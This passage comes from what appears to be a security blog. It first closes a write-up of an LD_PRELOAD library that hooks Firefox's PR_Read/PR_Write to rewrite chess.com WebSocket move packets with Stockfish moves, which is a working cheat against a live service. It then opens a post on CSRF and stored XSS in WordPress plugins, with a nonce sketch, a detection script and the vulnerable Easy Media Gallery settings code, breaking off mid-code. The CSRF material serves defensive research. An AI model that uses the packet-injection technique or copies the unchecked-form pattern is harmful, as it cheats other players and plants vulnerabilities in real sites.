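    }
    return NULL;
}

/*
 * Mirrors the handshake test in the PR_Write() hook: reject by size first,
 * then look for the four header needles used in the excerpt above.
 */
int looks_like_ws_handshake_sketch(const char *buf, size_t amount)
{
    if (amount <= 600 || amount >= 1200)
        return 0;

    return mem_contains_sketch(buf, amount, "Upgrade: websocket") != NULL &&
           mem_contains_sketch(buf, amount, "Origin: http://live.chess.com") != NULL &&
           mem_contains_sketch(buf, amount, "Sec-WebSocket-Key:") != NULL &&
           mem_contains_sketch(buf, amount, "Sec-WebSocket-Version: 13") != NULL;
}
```

<p>Checking the length before searching matters here, because every single read and write of the browser passes through the hooks.</p>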
<p>I hope the above code is more or less self-explanatory. But in case it's
not, here's a short summary of the rough algorithm it implements:</p>
<p><strong>1.</strong> The shared library (let's call it libpwh.so) is dynamically
loaded into a Firefox process with the LD_PRELOAD trick. For instance:
<code>export LD_PRELOAD=$PWD/libpwh.so; /usr/bin/firefox</code><br>
<strong>2.</strong> The functions <code>PR_Read()</code> and <code>PR_Write()</code> are hooked.<br>
<strong>3.</strong> As soon as a WebSocket request that indicates the beginning of a
new live.chess.com chess game is detected, the shared library (the above
code) initializes the <a href="http://stockfishchess.org/" title="chess engine">local Stockfish chess
engine</a> with the function
<em>int initStockfish()</em> (there should be enough time before the game
actually begins to pre-calculate some moves).<br>
<strong>3.1</strong> When a JSON message like the following</p>
<div class="highlight"><pre><span></span><code><span class="p">[{</span><span class="nt">"data"</span><span class="p">:{</span><span class="nt">"sid"</span><span class="p">:</span><span class="s2">"gserv"</span><span class="p">,</span><span class="nt">"game"</span><span class="p">:{</span><span class="nt">"id"</span><span class="p">:</span><span class="mi">706548893</span><span class="p">,</span><span class="nt">"status"</span><span class="p">:</span><span class="s2">"starting"</span><span class="p">,</span><span class="nt">"seq"</span><span class="p">:</span><span class="mi">0</span><span class="p">,</span><span class="nt">"players"</span><span class="p">:[{</span><span class="nt">"uid"</span><span class="p">:</span><span class="s2">"rocchen"</span><span class="p">,</span><span class="nt">"status"</span><span class="p">:</span><span class="s2">"playing"</span><span class="p">,</span><span class="nt">"lag"</span><span class="p">:</span><span class="mi">4</span><span class="p">,</span><span class="nt">"lagms"</span><span class="p">:</span><span class="mi">415</span><span class="p">,</span><span class="nt">"gid"</span><span class="p">:</span><span class="mi">706548893</span><span class="p">},{</span><span class="nt">"uid"</span><span class="p">:</span><span class="s2">"workcentre7328"</span><span class="p">,</span><span class="nt">"status"</span><span class="p">:</span><span class="s2">"playing"</span><span class="p">,</span><span class="nt">"lag"</span><span class="p">:</span><span class="mi">2</span><span class="p">,</span><span class="nt">"lagms"</span><span class="p">:</span><span class="mi">210</span><span class="p">,</span><span class="nt">"gid"</span><span class="p">:</span><span class="mi">706548893</span><span class="p">}],</span><span class="nt">"abortable"</span><span class="p">:[</span><span class="kc">true</span><span class="p">,</span><span class="kc">true</span><span class="p">],</span><span class="nt">"moves"</span><span class="p">:</span><span 
class="s2">""</span><span class="p">,</span><span class="nt">"clocks"</span><span class="p">:[</span><span class="mi">600</span><span class="p">,</span><span class="mi">600</span><span class="p">],</span><span class="nt">"draws"</span><span class="p">:[],</span><span class="nt">"repeated"</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="nt">"squares"</span><span class="p">:[</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">]},</span><span class="nt">"tid"</span><span class="p">:</span><span class="s2">"GameState"</span><span class="p">},</span><span class="nt">"channel"</span><span class="p">:</span><span class="s2">"/game/706548893"</span><span class="p">}]</span><span class="w"></span>
</code></pre></div>
<p>is intercepted, a game has begun. The needles that indicate such a
beginning are thus the players' UIDs and the string <em>"status":"starting"</em>.<br>
<strong>4.</strong> From now on, every outgoing packet (from <code>PR_Write()</code>) that
carries a move must be rewritten with a chess engine move. This is done
with the function <code>modifyMove()</code>, which in turn relies on a
correct game state. Such an outbound packet looks like this (we have discussed
the protocol in the previous chapter):</p>
<div class="highlight"><pre><span></span><code><span class="p">[{</span><span class="nt">"channel"</span><span class="p">:</span><span class="s2">"/service/user"</span><span class="p">,</span><span class="nt">"data"</span><span class="p">:{</span><span class="nt">"move"</span><span class="p">:{</span><span class="nt">"gid"</span><span class="p">:</span><span class="mi">706662190</span><span class="p">,</span><span class="nt">"seq"</span><span class="p">:</span><span class="mi">11</span><span class="p">,</span><span class="nt">"uid"</span><span class="p">:</span><span class="s2">"rocchen"</span><span class="p">,</span><span class="nt">"move"</span><span class="p">:</span><span class="s2">"9I"</span><span class="p">,</span><span class="nt">"clock"</span><span class="p">:</span><span class="mi">76</span><span class="p">,</span><span class="nt">"clockms"</span><span class="p">:</span><span class="mi">7661</span><span class="p">,</span><span class="nt">"squared"</span><span class="p">:</span><span class="kc">false</span><span class="p">},</span><span class="nt">"sid"</span><span class="p">:</span><span class="s2">"gserv"</span><span class="p">,</span><span class="nt">"tid"</span><span class="p">:</span><span class="s2">"Move"</span><span class="p">},</span><span class="nt">"id"</span><span class="p">:</span><span class="s2">"105"</span><span class="p">,</span><span class="nt">"clientId"</span><span class="p">:</span><span class="s2">"4gzikii6gu01a1k7kvdcb7a1h2gh6"</span><span class="p">}]</span><span class="w"></span>
</code></pre></div>
<p><strong>5.</strong> Concurrently with step 4, the move made by the opponent is
synchronized with a local gameState struct variable. The opponent's move
is obtained in <code>PR_Read()</code>, and the function <em>collectGameState()</em>
keeps the move history current. The function <em>collectGameState()</em> also
stores the current game state in a C struct:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// This struct holds the current game state and all kinds of game information as parsed and extracted from the live session</span>
<span class="k">typedef</span><span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">status</span><span class="p">[</span><span class="mh">0x50</span><span class="p">];</span><span class="w"> </span><span class="c1">// The status as defined by the protocol. Will be most likely 'playing' during a game.</span>
<span class="w"> </span><span class="kt">uint64_t</span><span class="w"> </span><span class="n">gameID</span><span class="p">;</span><span class="w"> </span><span class="c1">// The global game id. Can be looked up after games to review the game.</span>
<span class="w"> </span><span class="kt">uint32_t</span><span class="w"> </span><span class="n">moveNumber</span><span class="p">;</span><span class="w"> </span><span class="c1">// The number of moves I did</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">playerName</span><span class="p">[</span><span class="mh">0x50</span><span class="p">];</span><span class="w"> </span><span class="c1">// Me</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">opponentPlayerName</span><span class="p">[</span><span class="mh">0x50</span><span class="p">];</span><span class="w"> </span><span class="c1">// Poor opponent</span>
<span class="w"> </span><span class="kt">uint64_t</span><span class="w"> </span><span class="n">remainingTimeMsSelf</span><span class="p">;</span><span class="w"> </span><span class="c1">// yeah does that matter?</span>
<span class="w"> </span><span class="kt">uint64_t</span><span class="w"> </span><span class="n">remainingTimeMsOpponent</span><span class="p">;</span><span class="w"> </span><span class="c1">// probably more relevant</span>
<span class="w"> </span><span class="kt">uint16_t</span><span class="w"> </span><span class="n">lagMsSelf</span><span class="p">;</span><span class="w"> </span><span class="c1">// i have a stupid connection here in my house</span>
<span class="w"> </span><span class="kt">uint16_t</span><span class="w"> </span><span class="n">lagMsOpponent</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">movesMade</span><span class="p">[</span><span class="mh">0x100</span><span class="p">];</span><span class="w"> </span><span class="c1">// in live.chess.com encoded version</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">movesMadeDecoded</span><span class="p">[</span><span class="mh">0x400</span><span class="p">];</span><span class="w"> </span><span class="c1">// the decoded version</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">currentMoveOpponent</span><span class="p">[</span><span class="mh">0x3</span><span class="p">];</span><span class="w"> </span><span class="c1">// last move of opponent</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">currentMoveSelf</span><span class="p">[</span><span class="mh">0x3</span><span class="p">];</span><span class="w"> </span><span class="c1">// my last move</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">currentMoveOpponentDecoded</span><span class="p">[</span><span class="mh">0x6</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">currentMoveSelfDecoded</span><span class="p">[</span><span class="mh">0x6</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">engineMoves</span><span class="p">[</span><span class="mh">0x100</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">engineSuggestion</span><span class="p">[</span><span class="mh">0x6</span><span class="p">];</span><span class="w"> </span><span class="c1">// The best move as suggested by the engine</span>
<span class="p">}</span><span class="w"> </span><span class="n">_CHESS_COM_GAME_SESSION_STATE</span><span class="p">;</span><span class="w"></span>
</code></pre></div>
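<p>Steps 3.1 and 4 both come down to picking a few bytes out of a JSON packet without running a full parser. The following is a rough sketch of how that could be done, not the code from the repository: the function names <code>find_bytes</code>, <code>is_game_start_sketch</code> and <code>extract_move_sketch</code> are invented for this example. It assumes the packet layout shown above, where the outer <code>"move"</code> key holds an object and the inner one holds the encoded two-character move as a string, so searching for <code>"move":"</code> (with the opening quote of the value) only matches the inner key.</p>

```c
#include <stddef.h>
#include <string.h>

/* Bounded substring search; packet buffers are not NUL-terminated. */
static const char *find_bytes(const char *buf, size_t len, const char *needle)
{
    size_t n = strlen(needle);

    if (n == 0 || len < n)
        return NULL;
    for (size_t i = 0; i + n <= len; i++) {
        if (memcmp(buf + i, needle, n) == 0)
            return buf + i;
    }
    return NULL;
}

/* Step 3.1: a game start shows "status":"starting" together with our UID. */
int is_game_start_sketch(const char *buf, size_t len, const char *uid)
{
    return find_bytes(buf, len, "\"status\":\"starting\"") != NULL &&
           find_bytes(buf, len, uid) != NULL;
}

/*
 * Step 4: copy the string value of the inner "move" key into out and
 * NUL-terminate it. Returns the length of the move, or -1 if the key is
 * missing, the value is not terminated, or out is too small.
 */
int extract_move_sketch(const char *buf, size_t len, char *out, size_t out_size)
{
    static const char key[] = "\"move\":\"";
    const size_t key_len = sizeof key - 1;
    const char *hit = find_bytes(buf, len, key);
    const char *end = buf + len;
    const char *value;
    size_t n = 0;

    if (hit == NULL || out_size == 0)
        return -1;

    value = hit + key_len;
    while (value + n < end && value[n] != '"')
        n++;

    if (value + n == end)   /* ran off the packet without a closing quote */
        return -1;
    if (n + 1 > out_size)   /* no room for the move plus the terminator */
        return -1;

    memcpy(out, value, n);
    out[n] = '\0';
    return (int)n;
}
```

<p>With a three-byte destination such as <code>currentMoveSelf</code> from the struct above, a two-character move like <code>9I</code> fits exactly, and anything longer is rejected instead of overflowing the buffer.</p>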
<h3 id="chap_concl">Conclusion</h3>
<p>Hooking is a dirty business, and it was not as good an idea as I thought.
The idea turned out to be rather average and the implementation is pretty
bad. All in all, I am still satisfied, because it works!</p>
<p>It would probably be a better approach if I managed to hook directly into
<a href="http://mxr.mozilla.org/mozilla-central/source/netwerk/protocol/websocket/WebSocketChannel.cpp">WebSocketChannel.cpp</a>,
because then I wouldn't need to cumbersomely pick my target messages out of the
huge traffic that flows through <code>PR_Read()</code>.</p>
<p>It's a really strange bot to use, because while my bot modifies packets,
<strong>the JavaScript frontend can't properly deal with this fact and
displays a huge mess!</strong> This is really interesting because the frontend
(in Flash and JavaScript) notes that I made a specific move and saves it
accordingly in its variables/objects, but suddenly the game server
says that I actually made a totally different move (the one that was
injected by my code). So the poor frontend is heavily confused and
sometimes needs up to 10 moves to show the <em>real</em> moves in the
browser window. You can observe this behaviour in the video.
It's really funny!</p>
<p>To be honest, my bot still has many open issues and sometimes the
Firefox process crashes randomly. Maybe there's a memory leak somewhere,
because after several games something eats up the whole heap and the whole
Linux system crashes.</p>
<p>I am pretty sure it's not my malloc/calloc usage, because I carefully checked
that every allocated buffer gets free()'d. But on the other hand, I must be the
culprit, because without me hooking into Firefox, everything works like
a charm.</p>
<p>Either I am too inexperienced or it <em>just is</em> hard, but I think making a
click bot (as discussed above) for browser games is a far better
approach if you're strictly result-oriented :)</p>
<h3 id="chap_demo">Demonstration videos</h3>
<p>These two videos are of rather low quality, but you can still
comfortably recognize the chess game:</p>
<!-- This version of the embed code is no longer supported. Learn more: https://vimeo.com/s/tnm -->
<object width="500" height="281">
<param name="allowfullscreen" value="true"></param><param name="allowscriptaccess" value="always"></param><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=85060026&force_embed=1&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=00adef&fullscreen=1&autoplay=0&loop=0"></param>
<embed src="http://vimeo.com/moogaloop.swf?clip_id=85060026&force_embed=1&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=00adef&fullscreen=1&autoplay=0&loop=0" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="500" height="281">
</embed>
</object>
<!-- This version of the embed code is no longer supported. Learn more: https://vimeo.com/s/tnm -->
<object width="500" height="281">
<param name="allowfullscreen" value="true"></param><param name="allowscriptaccess" value="always"></param><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=85083958&force_embed=1&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=00adef&fullscreen=1&autoplay=0&loop=0"></param>
<embed src="http://vimeo.com/moogaloop.swf?clip_id=85083958&force_embed=1&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=00adef&fullscreen=1&autoplay=0&loop=0" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="500" height="281">
</embed>
</object>
<p><strong>Please note the following to understand the video</strong>:
I make random moves with the king. They are <em>not actually being submitted</em> to the
server; they are only shown in the client-side interface (that is what
you can see in the browser). <strong>The real moves are chosen
by the Stockfish engine and then injected into the WebSocket messages.</strong>
That's also the reason the chessboard sometimes suddenly updates:
the client-side GUI recognizes that it showed the <em>false</em> moves.
Then you can see the real moves for a second again.</p>Exploiting wordpress plugins through admin options (No 3. — Easy Media Gallery stored XSS)2013-12-17T12:16:00+01:002013-12-17T12:16:00+01:00Nikolai Tschachertag:incolumitas.com,2013-12-17:/2013/12/17/exploiting-wordpress-plugins-using-insecure-admin-forms-no-3-example-exploit-included/<h3>Preface</h3>
<p>This post is about general security weaknesses in WordPress plugins
that allow malicious attackers to gain code execution on the web
server (quite often as the user www-data). To outline the problem
briefly: WordPress plugins often need an administration form to handle
settings and options. These options are meant to be
alterable exclusively by the admin of the WordPress site. Unfortunately, lots of
WordPress plugins suffer from a very dangerous combination of
<a href="http://epiqo.com/en/all-your-pants-are-danger-csrf-explained" title="CSRF explained">CSRF</a>
and stored XSS vulnerabilities that, wrapped up in a social engineering
approach, may break the site.</p>
<p>I have done some research in the past about such attacks. You can read
about a <a href="http://incolumitas.com/2013/07/27/no-2-flash-album-gallery-persistent-xss-exploitet-with-help-of-xsrf-leading-to-remote-code-execution-k/" title="stored xss in flash album gallery">stored xss in flash album gallery
plugin</a>
as well as my findings about a similar flaw in the <a href="http://incolumitas.com/2013/03/15/no-1-wp-members-interesting-peristant-xss-leading-to-remote-code-execution/">wp members
plugin</a>.</p>
<h3>What does the attack vector look like?</h3>
<p>First we need to understand how administration menus are created in
WordPress, because these forms are the point where data flows into an
application. You can learn more about the underlying concept in the
<a href="http://codex.wordpress.org/Administration_Menus" title="administration menues in wordpress">WordPress
codex</a>.</p>
<p>The crucial point to understand is that they all consist of forms,
regardless of whether you pack your options under a
predefined, already existing top-level menu like <em>Tools</em> or
<em>Settings</em>, or create your own top-level menu with a call
to
<a href="http://codex.wordpress.org/Function_Reference/add_menu_page" title="add_menu_page function">add_menu_page()</a>.<br>
Either way, you are going to populate your new menu with one or more
forms. WordPress tries to point plugin authors towards best
practices with the <a href="http://codex.wordpress.org/Settings_API" title="the wordpress settings API">settings
API</a>.
The API basically implements security checks (nonces, to be specific) for
the forms and spares you a lot of complex debugging of the underlying
options management (no need to tinker with databases).<br>
In particular, the security checks prevent
<a href="http://en.wikipedia.org/wiki/Cross-site_request_forgery">CSRF</a> attacks
by including a <a href="http://en.wikipedia.org/wiki/Cryptographic_nonce">nonce</a>
that is sent with every request. Such a form with nonces looks like the
following (the example shows the beginning of the general sub-level menu
form from the <em>Settings</em> top-level menu):</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">form</span> <span class="na">method</span><span class="o">=</span><span class="s">"post"</span> <span class="na">action</span><span class="o">=</span><span class="s">"options.php"</span><span class="p">></span>
<span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">'hidden'</span> <span class="na">name</span><span class="o">=</span><span class="s">'option_page'</span> <span class="na">value</span><span class="o">=</span><span class="s">'general'</span> <span class="p">/></span>
<span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"action"</span> <span class="na">value</span><span class="o">=</span><span class="s">"update"</span> <span class="p">/></span>
<span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">id</span><span class="o">=</span><span class="s">"_wpnonce"</span> <span class="na">name</span><span class="o">=</span><span class="s">"_wpnonce"</span> <span class="na">value</span><span class="o">=</span><span class="s">"aa07348d33"</span> <span class="p">/><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"_wp_http_referer"</span> <span class="na">value</span><span class="o">=</span><span class="s">"/~nikolai/wordpress_pentest/wordpress/wp-admin/options-general.php"</span> <span class="p">/></span>
<span class="p"><</span><span class="nt">table</span> <span class="na">class</span><span class="o">=</span><span class="s">"form-table"</span><span class="p">></span>
[...]
<span class="p"></</span><span class="nt">table</span><span class="p">></span>
</code></pre></div>
<p>So any attacker who now tries to fool a victim into executing a
specific action by submitting a form needs to know the nonce's value.
But she can't know this nonce, because it is derived on the server from
values she has no access to (a secret of the site, the logged-in user and
the action) when the form is generated. Without a valid
nonce, WordPress refuses to process any action associated with the
form data.</p>
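<p>To make the idea more tangible, here is a minimal Python sketch of how such a nonce could be created and verified. It is not WordPress's actual code: the names <em>SECRET_KEY</em>, <em>create_nonce()</em> and <em>verify_nonce()</em>, the SHA-256 HMAC and the 12-hour tick are assumptions chosen for illustration. The only point is that a token bound to a server-side secret, a user and an action can't be forged by a third party.</p>

```python
import hashlib
import hmac
import time

# Hypothetical server-side secret; a real site would load it from its configuration.
SECRET_KEY = b"hypothetical-site-secret"
# Assumed tick length: a nonce stays valid for the current and the previous tick.
TICK_SECONDS = 12 * 60 * 60


def _token(tick, action, user_id):
    """Derive a short token from the secret, the time tick, the action and the user."""
    message = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(SECRET_KEY, message, hashlib.sha256).hexdigest()[:10]


def create_nonce(action, user_id, now=None):
    """Return the nonce that gets embedded into the form as a hidden field."""
    now = time.time() if now is None else now
    return _token(int(now // TICK_SECONDS), action, user_id)


def verify_nonce(nonce, action, user_id, now=None):
    """Accept the nonce only if it matches the current or the previous tick."""
    now = time.time() if now is None else now
    tick = int(now // TICK_SECONDS)
    for candidate_tick in (tick, tick - 1):
        expected = _token(candidate_tick, action, user_id)
        # Constant-time comparison on bytes to avoid leaking how many characters match.
        if hmac.compare_digest(expected.encode(), nonce.encode()):
            return True
    return False
```

<p>An attacker who builds a cross-site form has no way to compute this value without the secret, and a token issued for one action or user is rejected for any other.</p>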
<p>Now there wouldn't be any problem at all, if every form was protected
with nonces. But wait a second. After reading yet another <a href="http://codex.wordpress.org/WordPress_Nonces" title="wp nonces">codex page
about nonces</a>,
we can begin asking ourselves questions: Is adding nonces actually
enough to secure actions?</p>
<p>No, of course it's not enough. You also need to verify them. This may be
obvious to people who know how CSRF attacks work, but I have seen quite a few
plugins where forms were equipped with nonce creation functions like
<em>wp_create_nonce()</em>, <em>wp_nonce_field()</em> or <em>wp_nonce_url()</em>, but
the associated action was never checked for validity with the
corresponding functions <em>check_admin_referer()</em>,
<em>check_ajax_referer()</em> or <em>wp_verify_nonce()</em>.</p>
<p>Some months ago, I wrote a quick (and still unfinished) Python script that extracts all calls to
nonce creation functions and checks whether there is a corresponding
call to a nonce verification function. If there isn't, there might be a
CSRF vulnerability.</p>
<div class="highlight"><pre><span></span><code><span class="n">__author__</span> <span class="o">=</span> <span class="s1">'nikolai tschacher'</span>
<span class="c1"># Unfinished.</span>
<span class="c1"># Idea: Maybe use a lexer/tokenizer to process PHP function signatures. But it still remains a really tough task</span>
<span class="c1"># to verify if a nonce with a specific action gets verified or not. One approach is to look for the $action string.</span>
<span class="c1"># But we're screwed if this string is created dynamically in an expression and is not a simple string literal.</span>
<span class="c1"># Simple idea: Just *count* all nonce creation functions and all nonce verification functions. If there are fewer</span>
<span class="c1"># of the latter, actions might be unverified and thus vulnerable to CSRF attacks.</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">argparse</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="c1"># stores all action strings to nonce creation function like:</span>
<span class="c1"># - wp_nonce_url( $actionurl, $action = -1, $name = '_wpnonce' )</span>
<span class="c1"># - wp_nonce_field( $action = -1, $name = "_wpnonce", $referer = true , $echo = true )</span>
<span class="c1"># - wp_create_nonce( $action = -1 )</span>
<span class="c1"># The appropriate regex. This is quite harsh to do correctly since you essentially need to parse a PHP function call signature</span>
<span class="c1"># with some plain regexes...</span>
<span class="n">nonces_created</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">NONCE_CREATION_FUNCTIONS</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'''(wp_nonce_url|wp_nonce_field|wp_create_nonce)\s*\(\s*(\s*\$action\s*=\s*)?("|')\s*\w*\s*("|')\s*\)'''</span><span class="p">)</span>
<span class="n">COUNT_NONCE_CF</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">''</span><span class="p">)</span>
<span class="c1"># holds all nonce verification functions as:</span>
<span class="c1"># - wp_verify_nonce( $nonce, $action = -1 )</span>
<span class="c1"># - check_admin_referer( $action = -1, $query_arg = '_wpnonce' )</span>
<span class="c1"># - check_ajax_referer( $action = -1, $query_arg = false, $die = true )</span>
<span class="n">nonces_verified</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">def</span> <span class="nf">walk_plugin_files</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">callback</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">dirs</span><span class="p">,</span> <span class="n">files</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
        <span class="k">for</span> <span class="n">file</span> <span class="ow">in</span> <span class="n">files</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">file</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'.php'</span><span class="p">):</span>
                <span class="n">callback</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">file</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">collect_nonces</span><span class="p">(</span><span class="n">file</span><span class="p">):</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="s1">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">nonces_created</span><span class="o">.</span><span class="n">extend</span><span class="p">([</span><span class="n">m</span><span class="o">.</span><span class="n">group</span><span class="p">()</span> <span class="k">for</span> <span class="n">m</span> <span class="ow">in</span> <span class="n">NONCE_CREATION_FUNCTIONS</span><span class="o">.</span><span class="n">finditer</span><span class="p">(</span><span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">())])</span>
        <span class="k">except</span> <span class="ne">UnicodeDecodeError</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
            <span class="k">pass</span>
<span class="k">def</span> <span class="nf">verify_nonces</span><span class="p">(</span><span class="n">file</span><span class="p">):</span>
    <span class="k">pass</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">argparse</span><span class="o">.</span><span class="n">ArgumentParser</span><span class="p">()</span>
    <span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'plugin_path'</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s2">"the path to a wordpress plugin that should be checked for CSRF"</span><span class="p">,</span>
        <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">)</span>
    <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="o">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="c1"># First collect all occurrences of nonces</span>
    <span class="n">walk_plugin_files</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">plugin_path</span><span class="p">,</span> <span class="n">collect_nonces</span><span class="p">)</span>
    <span class="c1"># And then try to check whether nonces are also checked before an action</span>
    <span class="n">walk_plugin_files</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">plugin_path</span><span class="p">,</span> <span class="n">verify_nonces</span><span class="p">)</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">nonces_created</span><span class="p">)</span>
</code></pre></div>
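<p>The "simple idea" from the comments of that script, just counting creation and verification calls, could look roughly like the following sketch. It is a separate, hypothetical helper (the names <em>count_nonce_calls()</em> and <em>might_lack_verification()</em> are made up here) that works on PHP source passed in as a string. It is a crude heuristic and does not match actions to each other.</p>

```python
import re

# Function names as listed in the article; \b avoids matching e.g. my_wp_create_nonce(.
CREATION_CALL = re.compile(
    r"\b(?:wp_nonce_url|wp_nonce_field|wp_create_nonce)\s*\(")
VERIFICATION_CALL = re.compile(
    r"\b(?:wp_verify_nonce|check_admin_referer|check_ajax_referer)\s*\(")


def count_nonce_calls(php_source):
    """Return (number of creation calls, number of verification calls)."""
    created = len(CREATION_CALL.findall(php_source))
    verified = len(VERIFICATION_CALL.findall(php_source))
    return created, verified


def might_lack_verification(php_source):
    """Flag source in which fewer nonces are verified than created."""
    created, verified = count_nonce_calls(php_source)
    return verified < created


if __name__ == "__main__":
    sample = "<?php wp_nonce_field('save'); echo wp_create_nonce('x'); check_admin_referer('save');"
    print(count_nonce_calls(sample), might_lack_verification(sample))
```

<p>Keep in mind that such a count says nothing about a form handler that uses no nonces at all, so a clean result does not mean a plugin is safe.</p>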
<h3>Where's the problem then?</h3>
<p>Nowhere and everywhere ;)</p>
<p>Although the security architecture of the WordPress core seems to be
okay (as far as I can judge; honestly, I didn't really dig <em>deep
enough</em> to find potential flaws), a lot of the functionality that
the slim WordPress core lacks is added through plugins.<br>
Furthermore, it's an unfortunate fact that a lot of plugin authors tend
to be unaware of the many ways to blunder in security-critical
code (myself included; writing about web security does not mean
writing flawless code, apparently).<br>
And that is exactly the root of all evil: we can give security-unaware
programmers plenty of good concepts and tools (like the settings
API or this <a href="http://codex.wordpress.org/Data_Validation" title="data validation in wordpress">codex
article</a>),
and they will still fail to produce solid and sound plugin code.</p>
<h3>Can we force plugin coders to program more securely?</h3>
<p>I think we can. For instance, we could force plugin authors to provide
nonces for all forms that they create, regardless of the nature of the
action itself (I mean, are there cases where nonces would be
counterproductive or even annoying?). Additionally, we need to enforce
that for every nonce created, there is a call to a function such as</p>
<ul>
<li><em>wp_verify_nonce( $nonce, $action = -1 )</em></li>
<li><em>check_admin_referer( $action = -1, $query_arg = '_wpnonce' )</em></li>
<li><em>check_ajax_referer( $action = -1, $query_arg = false, $die =
true )</em></li>
</ul>
<p>that verifies that the action stemmed from the intended origin.</p>
<p>I can already hear people cry that there is no way to force people to
write secure programs. But in my opinion, there are general guidelines
that at least prevent some common security problems. And hell: WordPress
plugins really suffer from the combined threat of XSS and CSRF!</p>
<h3>A concrete example — Stored XSS in Easy Media Gallery</h3>
<p>First, some information about the plugin:</p>
<ul>
<li>Plugin name: Easy Media Gallery</li>
<li><a href="http://wordpress.org/plugins/easy-media-gallery/" title="easy media gallery">Plugin
URL</a></li>
<li>Vendor: <a href="http://ghozylab.com/" title="ghozylab">Ghozylab</a></li>
<li>Vulnerable version:
<a href="http://wordpress.org/plugins/easy-media-gallery/developers/">1.2.25</a></li>
<li>Downloads: 124,042</li>
</ul>
<p>I didn't need to dig deep to find a very critical security vulnerability
in the Easy Media Gallery plugin. In the file
<em>wp-content/plugins/easy-media-gallery/includes/settings.php</em> on line
14, the following function (reformatted, because the original source
code is a pain to read) causes a lot of inconvenience:</p>
<div class="highlight"><pre><span></span><code><span class="x">function spg_add_admin() {</span>
<span class="x"> global $emgplugname, $theshort, $theopt;</span>
<span class="x"> if (is_admin() && ( isset($_GET['page']) == 'emg_settings' ) && ( isset($_GET['post_type']) == 'easymediagallery' )) {</span>
<span class="x"> if (isset($_REQUEST['action']) && 'save' == $_REQUEST['action']) {</span>
<span class="x"> $curtosv = get_option('easy_media_opt');</span>
<span class="x"> foreach ($theopt as $theval) {</span>
<span class="x"> $curtosv[$theval['id']] = $_REQUEST[$theval['id']];</span>
<span class="x"> update_option('easy_media_opt', $curtosv);</span>
<span class="x"> }</span>
<span class="x"> header("Location: edit.php?post_type=easymediagallery&page=emg_settings&saved=true");</span>
<span class="x"> die;</span>
